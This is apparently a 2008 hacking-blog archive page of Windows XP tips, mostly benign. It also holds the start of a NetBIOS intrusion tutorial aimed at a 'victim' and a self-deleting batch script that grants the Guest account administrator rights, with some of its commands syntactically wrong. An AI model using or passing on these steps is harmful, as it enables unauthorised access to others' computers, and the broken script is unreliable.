ss_blog_claim=a4ad00c49e7f47b03a717f10fb765c1e

  • Amol Wagh
  • Buffer Overflow
  • Collected from Diary
  • Ethical hacking
  • General
  • Google Hacking
  • Hacking
  • HE-Exclusive
  • i pod
  • IP
  • Latest News
  • Nashik Times
  • Network Security
  • Rapidshare
  • Registry
  • tech lounge
  • Tips and Tricks
  • Tutorials
  • Uncategorized
  • Viruses
  • Vista
  • Vulnerabilities
  • Windows
  • XP
  • Archive for the ‘XP’ Category

    Gmail Storage Drive

    Tuesday, August 5th, 2008

    GMail Drive is a Shell Namespace Extension that creates a virtual filesystem around your Google GMail account, allowing you to use GMail as a storage medium. GMail Drive creates a virtual filesystem on top of your Google GMail account and enables you to save and retrieve files stored on your GMail account directly from inside [...]

    Hiding Your Computer on the Internet

    Tuesday, July 29th, 2008

    When you use internet, you are connected to millions of PC’s out there. And each PC have its own unique address known as Static IP Address. This gives your identification by locality.
    Without a firewall, on a typical computer, even if well maintained, a remote person will still be able to know that the communication effort [...]

    How to Block Pop-Ups and Banner Ads

    Tuesday, July 29th, 2008

     
    Follow The steps to block Pop up banners by changing settings in Internet Explorer.
     
    1) Go to TOOLS and then INTERNET OPTIONS.
     
    2) Click the SECURITY tab, move the slider up to HIGH and click APPLY.
     
    This applies the highest security settings to IE, which blocks EVERYTHING, including JavaScript, Applets, and so on that pop-ups are based upon.
     
    The [...]

    How To Convert File System,FAT - FAT32 to NTFS

    Sunday, July 27th, 2008

    Open a dos prompt and type the command
     
    convert d: /fs:NTFS
     
    This command would convert your d: drive to NTFS
     
    If the system cannot lock the drive, you will be prompted to convert it during next reboot.
     
    Normally you should select yes.
     
    Conversion from fat/fat32 to NTFS is non-destructive, your data on the drive will NOT be lost.
     
    Be aware that [...]

    Make Your Windows 98/XP/Vista to Boot Fatser

    Saturday, July 26th, 2008

    1. Open notepad.exe, type “del c:windowsprefetch tosboot-*.* /q” (without the quotes) & save as “ntosboot.bat” in c:
    2. From the Start menu, select “Run…” & type “gpedit.msc”.
    3. Double click “Windows Settings” under “Computer Configuration” and double click again on “Shutdown” in the right window.
    4. In the new window, click “add”, “Browse”, locate your “ntosboot.bat” file & [...]

    How To Create Windows XP/Vista Bootable Disk

    Friday, June 6th, 2008

    How to create a bootable Windows XP SP1 CD (Nero):
    Tip :You can replace XP SP1 with SP2 and 3 as mentioned in disk files.
    Step 1
    Create 3 folders - C:\WINXPSP1, C:\SP1106 and C:\XPBOOT
    Step 2
    Copy the entire Windows XP CD into folder C:\WINXPSP1

    Step 3
    You will have to download the SP1 Update, which is 133MB.
    Rename the Service Pack [...]

    NetBios Hacking For Windows 98/ME/NT/XP Tutorial

    Sunday, June 1st, 2008

    Well one of the famous, easy and easy to understand type of hacking is Net Bios. You can play with it as follows.
    Disclaimer: We don’t take any responsibility for Illegal use of this tutorial.

    Step 1
    Get a IP (range) scanner. (superscanner is a fast one, get it here).
    Scan the victim’s ip on TCP/IP port 139 (More [...]

    Hack Xp Guest Account To Get Administrator Privilages

    Sunday, March 23rd, 2008

    HaCk “GUEST” with Admin privileges……..
    echo off
    title Please wait…
    cls
    net user add Username Password /add
    net user localgroup Administrators Username /add
    net user Guest 420 /active:yes
    net localgroup Guests Guest /DELETE
    net localgroup Administrators Guest /add
    del %0
    Copy this to notepad and save the file as “Guest2admin.bat”
    then u can double click the file to execute or run in the cmd.
    it works…

    [...]

    About Hackers Enigma

    Hackers Enigma aims to provide an complete 'Ethical Hacking' database for beginers in this field as well as for those who are currently working in the same. We are covering here topics like XSS, SQL Injection Atttacks, Viruses, Penetration Tests, Open Source Security and Recent Security World News.